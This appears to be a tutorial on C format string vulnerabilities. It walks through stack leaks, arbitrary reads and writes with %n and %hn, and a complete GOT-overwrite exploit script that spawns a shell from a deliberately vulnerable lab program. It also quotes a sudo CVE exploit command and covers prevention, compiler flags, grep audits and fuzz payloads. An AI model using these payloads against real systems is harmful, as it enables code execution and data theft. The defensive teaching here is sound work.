Format string vulnerabilities are unique in the exploit world. Most memory corruption bugs give you either a read or a write — buffer overflows write, out-of-bounds reads leak data. Format strings give you both. A single printf(user_input) call gives the attacker the ability to read arbitrary stack memory AND write to arbitrary memory addresses.
The fix is one of the simplest in all of security: use printf("%s", input) instead of printf(input). Yet format string bugs keep appearing in production code because developers don’t understand why printf(input) is dangerous.
How printf() Actually Works
To understand the vulnerability, you need to understand how variadic functions work in C.
printf is a variadic function — it accepts a variable number of arguments. The first argument is always the format string, which tells printf how many additional arguments to expect and how to interpret them:
printf("Name: %s, Age: %d, Balance: %.2f\n", name, age, balance);
// ↑ format string ↑ 3 additional args
When printf encounters %s, it reads the next value from the stack (or from a register, depending on the calling convention) and interprets it as a pointer to a string. When it encounters %d, it reads the next value as an integer.
The critical detail: printf has no way to verify how many arguments were actually passed. It trusts the format string completely. If the format string says “read 10 arguments,” printf reads 10 values from the stack — even if only 2 were passed.
// This compiles (at most with a -Wformat warning) and runs:
printf("%x %x %x %x %x"); // No arguments provided
// printf still reads 5 values: off the stack on 32-bit x86,
// from argument registers first on x86-64
// Those values are whatever happens to be there — local variables,
// saved registers, return addresses, canaries, secrets...
The Vulnerable Pattern
The vulnerability exists whenever user-controlled data is used as the format string:
// VULNERABLE — user controls the format string
char *user_input = get_user_input();
printf(user_input); // Classic format string bug
fprintf(stderr, user_input); // Same bug, different stream
sprintf(buffer, user_input); // Same bug, writes to buffer
snprintf(buf, sz, user_input); // Still vulnerable to read/write
syslog(LOG_INFO, user_input); // syslog's message argument is a printf-style format
// SAFE: user input is an argument, not the format
printf("%s", user_input); // Safe
fprintf(stderr, "%s", user_input); // Safe
sprintf(buffer, "%s", user_input); // Safe (but watch buffer overflow)
syslog(LOG_INFO, "%s", user_input); // Safe
The difference is one argument, and that argument separates printing a string from giving the attacker read and write access to your program’s memory.
Attack Phase 1: Reading Stack Memory
The simplest format string attack — leak information from the stack.
Basic Stack Dump
#include <stdio.h>
void vulnerable(char *input) {
char secret[] = "S3CR3T_K3Y";
int admin_flag = 0;
// VULNERABLE: user input as format string
printf(input);
printf("\n");
}
int main(int argc, char *argv[]) {
if (argc > 1) vulnerable(argv[1]);
return 0;
}
Compile without protections for learning:
gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.c
Now attack:
# Leak stack values as hex
$ ./vuln "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
bffff5a0.00000001.0804a008.bffff798.08048460.bffff5c0.52433353.4b5f5433
# Last two values, byte by byte from the low end (x86 is little-endian):
# 0x52433353 → 53 33 43 52 = "S3CR" and 0x4b5f5433 → 33 54 5f 4b = "3T_K"
# That's the start of "S3CR3T_K3Y": the secret is leaked!
Each %08x reads one 4-byte value from the stack and prints it as hex. The attacker keeps adding specifiers until they’ve dumped enough of the stack to find interesting data.
Direct Parameter Access
Instead of dumping sequentially, %N$x reads the Nth argument directly:
# Read the 7th stack value directly
$ ./vuln "%7\$x"
52433353
# %s treats the value as a pointer and prints the string it points to.
# 0x52433353 is string data, not an address, so this crashes:
$ ./vuln "%7\$s"
Segmentation fault
This is more precise and allows targeted data extraction. The attacker finds which stack position contains their target, then extracts it directly: %N$x for raw values, %N$s for positions that hold a pointer to a string.
Reading Arbitrary Memory Addresses
The attacker can read memory at any address by combining stack control with %s:
# Step 1: Find which stack position reflects our input
$ ./vuln "AAAA%6\$x"
AAAA41414141
# Position 6 contains our input (0x41414141 = "AAAA"); the exact position varies with the binary and its environment
# Step 2: Replace AAAA with a target address, use %s to read it as a string
$ ./vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'\x10\xa0\x04\x08' + b'%6\$s')")
# Reads whatever string is stored at address 0x0804a010
This turns a format string bug into an arbitrary read: the attacker can read any readable memory address.
What Attackers Leak
| Target | Why |
|---|---|
| Stack canary | Needed to bypass stack protector in buffer overflow |
| Return address | Reveals code section base (defeats PIE) |
| libc address | Reveals libc base (defeats ASLR for ROP chains) |
| Heap pointers | Useful for heap exploitation |
| Secrets/keys | API keys, encryption keys, session tokens stored in stack variables |
Attack Phase 2: Writing to Memory
This is where format strings become truly dangerous. The %n specifier writes instead of reading.
int count;
printf("Hello%n World", &count);
// %n writes the number of bytes printed so far (5) into count
// count is now 5
In a format string attack, the attacker controls which address %n writes to and what value is written:
Building the Write Primitive
# Step 1: We know position 6 reflects our input (from the read phase)
# Step 2: Place target address in our input, use %n to write to it
# Target: 0x0804a010 (e.g., GOT entry for puts)
# We want to write the value 0xDEAD to this address
$ ./vuln $(python3 -c "
import struct, sys
addr = struct.pack('<I', 0x0804a010)  # Target address (4 bytes already printed)
# 0xDEAD = 57005, so pad with 57005 - 4 = 57001 more characters
payload = addr + b'%57001x%6\$n'
sys.stdout.buffer.write(payload)
")
The key insight: %n writes the number of bytes printed so far. By padding the output with %Nx (print at least N characters), the attacker controls the written value.
Writing Large Values with Short Writes
Writing a full 4-byte value with a single %n means printing that many characters first: about 134 million for 0x0804852d, over 3.7 billion for 0xDEADBEEF. The practical approach uses %hn (half-word write) or %hhn (byte write):
%n — writes 4 bytes (int)
%hn — writes 2 bytes (short)
%hhn — writes 1 byte (char)
To write 0xDEADBEEF to address 0x0804a010:
Write 0xBEEF to 0x0804a010 (low 2 bytes) using %hn
Write 0xDEAD to 0x0804a012 (high 2 bytes) using %hn
Payload:
[addr_low][addr_high]%[pad1]x%[pos1]$hn%[pad2]x%[pos2]$hn
Where:
addr_low = \x10\xa0\x04\x08 (0x0804a010)
addr_high = \x12\xa0\x04\x08 (0x0804a012)
pad1 = 0xBEEF - 8 = 48871 (adjust for already printed bytes)
pad2 = 0xDEAD - 0xBEEF = 8126 (difference between values)
pos1 = 6, pos2 = 7 (stack positions of addr_low and addr_high, from the read phase)
GOT Overwrite — The Classic Technique
The Global Offset Table (GOT) contains function pointers for dynamically linked functions. Overwriting a GOT entry redirects future calls to that function:
Before:
printf@GOT → 0x7f12345678 (real printf in libc)
After format string write:
printf@GOT → 0x7f12340010 (system() in libc)
Next time the program calls printf(user_input):
→ Actually calls system(user_input)
→ If user_input = "/bin/sh" → shell!
// Vulnerable program
void process(char *input) {
printf(input); // Format string bug
printf("\n"); // Caution: GCC compiles this to putchar('\n'), so it never goes through printf@GOT
// Better attack: if there's a second printf with controlled input
char cmd[100];
fgets(cmd, 100, stdin);
printf(cmd); // Now calls system(cmd) → system("/bin/sh")
}
Complete Exploitation Walkthrough
Here’s a realistic exploitation scenario, step by step:
// target.c — vulnerable server that reads input and logs it
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void log_message(char *msg) {
printf("[LOG] ");
printf(msg); // VULNERABLE
printf("\n[LOG] %zu bytes\n", strlen(msg)); // Has a conversion, so GCC keeps it a real printf call
}
void admin_panel() {
printf("ACCESS GRANTED — admin shell\n");
system("/bin/sh");
}
int main() {
char input[256];
printf("Enter message: ");
fgets(input, sizeof(input), stdin);
input[strcspn(input, "\n")] = '\0';
log_message(input);
return 0;
}
# Compile with partial protections (no PIE, no RELRO for GOT write)
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c
Step 1: Find input offset
$ echo 'AAAA%6$x' | ./target
[LOG] AAAA41414141
# Input is at position 6
Step 2: Find admin_panel address
$ objdump -d target | grep admin_panel
0804852d <admin_panel>:
Step 3: Find a GOT entry to overwrite
$ objdump -R target | grep printf
0804a010 R_386_JUMP_SLOT printf@GLIBC
Step 4: Write admin_panel address (0x0804852d) to printf@GOT (0x0804a010)
# exploit.py
import struct
got_printf_low = struct.pack('<I', 0x0804a010) # Low 2 bytes
got_printf_high = struct.pack('<I', 0x0804a012) # High 2 bytes
# admin_panel = 0x0804852d
# Low half = 0x852d = 34093
# High half = 0x0804 = 2052
# Payload: [addr1][addr2] = 8 bytes already printed
# Write 0x852d to low: need to print 34093 - 8 = 34085 more chars
# Write 0x0804 to high: 0x10804 - 0x852d = 33495 more chars (wraps to 0x0804)
payload = got_printf_low + got_printf_high
payload += b'%34085x%6$hn' # Write 0x852d to printf@GOT low
payload += b'%33495x%7$hn' # Write 0x0804 to printf@GOT high
import sys
sys.stdout.buffer.write(payload + b'\n')
$ (python3 exploit.py; cat) | ./target   # cat keeps stdin open for the spawned shell
[LOG] ... (lots of whitespace padding) ...
ACCESS GRANTED — admin shell
# The next printf call after printf(msg) goes through printf@GOT into admin_panel() → system("/bin/sh")
Format String Bugs in Modern Code
Format string bugs aren’t limited to ancient C code. They appear in:
Logging Libraries
// C — syslog
syslog(LOG_INFO, user_input); // VULNERABLE
syslog(LOG_INFO, "%s", user_input); // Safe
// C++ — still possible if wrapping printf
void log(const char *msg) {
fprintf(logfile, msg); // VULNERABLE
fprintf(logfile, "%s", msg); // Safe
}
C++ iostream vs printf
// iostream is inherently safe — no format specifiers
std::cout << user_input; // Safe — always treats as data
// But C++ code often still uses printf for formatting
printf(user_input.c_str()); // VULNERABLE — same bug
Python — Not Immune
Python’s % operator has no %n, and str.format() has no write primitive either, but a user-controlled str.format() template can still walk object attributes and leak information:
# Python format string information disclosure
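user_input = "{0.__init__.__globals__}"
print(user_input.format(some_object))
# Leaks the globals of the module that defines some_object's class (if that class defines __init__)
# str.format() allows attribute and index lookups but not calls, which is enough for template injection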
# f-strings evaluated at definition time — safe from injection
name = f"{user_input}" # Safe — user_input is data, not format
# But str.format() with user-controlled format IS dangerous
template = user_input # User provides: {config[SECRET_KEY]}
template.format(config=app.config) # Leaks app.config["SECRET_KEY"] when config is a dict (as in Flask)
Rust — Compile-Time Prevention
// Rust's format macros are checked at compile time
println!("{}", user_input); // Safe — format is a literal
// This won't even compile:
// let fmt = user_input;
// println!(fmt); // ERROR: format argument must be a string literal
Real-World Format String CVEs
Wu-FTPd (CVE-2000-0573)
One of the first widely exploited format string bugs. The FTP server passed user-supplied SITE EXEC arguments directly to a printf-like function, giving remote root access on systems running Wu-FTPd 2.6.0 and earlier.
sudo (CVE-2012-0809)
sudo versions 1.8.0 through 1.8.3p1 had a format string vulnerability in sudo_debug(): the program name (argv[0]) was embedded in the format string for debug output, which is enabled with the -D option. An attacker could create a symlink with format specifiers in the name:
ln -s /usr/bin/sudo '%n%n%n%n'
./'%n%n%n%n' -D9 /bin/sh # argv[0] reaches the format string inside setuid-root sudo
Exim Mail Server (CVE-2019-15846)
Unlike the other entries in this list, CVE-2019-15846 was a heap buffer overflow rather than a format string bug: a TLS ClientHello whose SNI (Server Name Indication) value ended in a backslash-null sequence let a remote attacker execute code as root on the mail server.
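iOS/macOS (multiple)
Apple has had several format string vulnerabilities in system services over the years, usually in logging code that passes user-controlled data to os_log or NSLog without a format specifier. A widely reported 2021 case: joining a Wi-Fi network named %p%s%s%s%s%n disabled Wi-Fi on iPhones until the network settings were reset.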
Prevention — The Complete Guide
Rule 1: Never Pass User Input as a Format String
// The one rule that prevents 100% of format string vulnerabilities:
printf("%s", user_input); // ALWAYS use a format specifier
// This applies to EVERY printf-family function:
printf("%s", msg);
fprintf(f, "%s", msg);
sprintf(buf, "%s", msg);
snprintf(buf, sz, "%s", msg);
syslog(pri, "%s", msg);
err(1, "%s", msg);
warn("%s", msg);
Rule 2: Compiler Warnings
GCC and Clang can detect most format string bugs at compile time:
# Enable format string warnings
gcc -Wformat -Wformat-security -Werror -o program program.c
# -Wformat: Check format string/argument type mismatches
# -Wformat-security: Warn when the format string is not a literal and has no arguments
# -Werror: Treat warnings as errors (blocks compilation)
// With -Wformat-security, this triggers a warning:
printf(user_input);
// warning: format not a string literal and no format arguments [-Wformat-security]
Rule 3: GCC’s __attribute__((format))
For custom printf-like functions, annotate them so the compiler checks their format strings:
#include <stdarg.h>
#include <stdio.h>
extern FILE *logfile; // Assumed to be opened elsewhere
// Tell GCC: argument 1 is a printf format, arguments start at 2
void my_log(const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void my_log(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
vfprintf(logfile, fmt, args);
va_end(args);
}
// Now GCC checks format string at compile time:
my_log("%s logged in", username); // OK
my_log(user_input); // WARNING
my_log("%d", "not an int"); // WARNING — type mismatch
Rule 4: Static Analysis
# Clang Static Analyzer
scan-build gcc -o program program.c
# CodeQL (GitHub's static analysis)
# Rule: cpp/non-constant-format
# Detects: printf-family calls with non-constant format strings
# Coverity
# CID: TAINTED_STRING
# Detects: User-tainted data flowing into format string position
# Flawfinder / rats
flawfinder --minlevel=3 program.c
# Reports all printf calls with non-literal format strings
Rule 5: FORTIFY_SOURCE
When compiled with -D_FORTIFY_SOURCE=2 (which only takes effect with optimization, -O1 or higher), glibc’s printf family rejects %n when the format string is in writable memory:
// With FORTIFY_SOURCE=2:
char fmt[] = "%s%n"; // Format in writable memory (stack/heap)
printf(fmt, str, &count); // *** %n in writable segment detected *** → abort
// Format in read-only memory (string literal) still works:
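printf("%s%n", str, &count); // OK — format is in .rodata
This doesn’t fix the information leak (%x/%p still work), but it blocks the write primitive: attacker-supplied input always lives in writable memory, so a %n smuggled in through it aborts the program.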
Rule 6: Runtime Mitigations
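glibc has no environment variable or tunable that disables %n. LIBC_FATAL_STDERR_ only makes glibc print fatal-error messages to stderr instead of the terminal, and GLIBC_TUNABLES=glibc.cpu.hwcaps masks CPU features; neither changes how printf handles %n. Some other C runtimes do remove it: Microsoft's CRT disables %n by default (it can be re-enabled with _set_printf_count_output), and Android's bionic aborts when it sees %n. On glibc, the runtime layer is the hardening that makes a write less useful: ASLR, PIE, and full RELRO.
Format String vs Buffer Overflow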
| Dimension | Format String | Buffer Overflow |
|---|---|---|
| Cause | User input as format string | Missing bounds check on copy |
| Read primitive | Yes: %x, %p, %s leak the stack | No (needs a separate info leak) |
| Write primitive | Yes: %n writes to memory | Yes: overwrites return address/GOT |
| Precision | Can write exact values byte by byte | Overwrites everything in between |
| ASLR bypass | Built in (leak with %p, write with %n) | Requires a separate info leak |
| Stack canary bypass | Leak the canary with %x, include it in the payload | Much harder (timing/brute force) |
| Detection | Easy: -Wformat-security catches most | Harder: requires bounds analysis |
| Fix complexity | Trivial: add "%s", | Varies; may require redesign |
The key advantage of format strings for attackers: they provide both read and write in a single vulnerability, making ASLR and stack canaries much easier to bypass than with buffer overflows alone.
Detection and Auditing
Grep Patterns for Code Review
# Find potentially vulnerable printf-family calls in C/C++ code
grep -rn 'printf\s*(' --include="*.c" --include="*.cpp" --include="*.h" . | \
grep -v 'printf\s*("'
# Shows printf-family calls whose first argument is NOT a string literal.
# fprintf/sprintf/snprintf take the format later, so their safe calls show up too: review by hand.
# Find syslog calls whose format (second argument) is not a string literal
grep -rn 'syslog\s*(' --include="*.c" . | grep -v 'syslog\s*([^,]*, *"'
# Find sprintf without literal format (also check for buffer overflow)
grep -rn 'sprintf\s*(' --include="*.c" . | grep -v 'sprintf\s*([^,]*, *"'
Automated Testing
# Fuzz with format string payloads
echo '%x%x%x%x%x%x%x%x' | ./program
echo '%s%s%s%s%s%s%s%s' | ./program # Likely crashes if vulnerable
echo '%n%n%n%n%n%n%n%n' | ./program # A crash (or FORTIFY's abort) means %n was interpreted; use test builds only
echo 'AAAA%p%p%p%p%p%p%p%p' | ./program # Look for 0x41414141 in output
# If any of these produce unexpected output or crashes, investigate.
Security Checklist
CODE:
[ ] No printf-family call uses user input as format string
[ ] All custom logging functions use "%s" for user data
[ ] Custom printf-like functions have __attribute__((format))
[ ] No string concatenation to build format strings with user data
[ ] Python str.format() and % templates are never user-controlled (f-strings are always literals)
COMPILE:
[ ] -Wformat and -Wformat-security enabled
[ ] -Werror treats format warnings as errors
[ ] -D_FORTIFY_SOURCE=2 enabled with -O1 or higher (blocks %n in writable memory)
[ ] Static analysis runs in CI (CodeQL, Coverity, or clang-tidy)
RUNTIME:
[ ] ASLR enabled
[ ] Full RELRO (-Wl,-z,relro,-z,now) prevents GOT overwrite
[ ] PIE enabled (makes GOT address unpredictable)
[ ] Stack canaries enabled (-fstack-protector-strong)
REVIEW:
[ ] Code review checklist includes format string patterns
[ ] Grep audit for printf-family calls run before release
[ ] Fuzz testing includes format string payloads
Format string vulnerabilities are the easiest critical bug to prevent. One rule, printf("%s", input), eliminates the entire class. Yet they keep appearing because developers don’t understand what printf(input) actually does at the machine level. Now you do.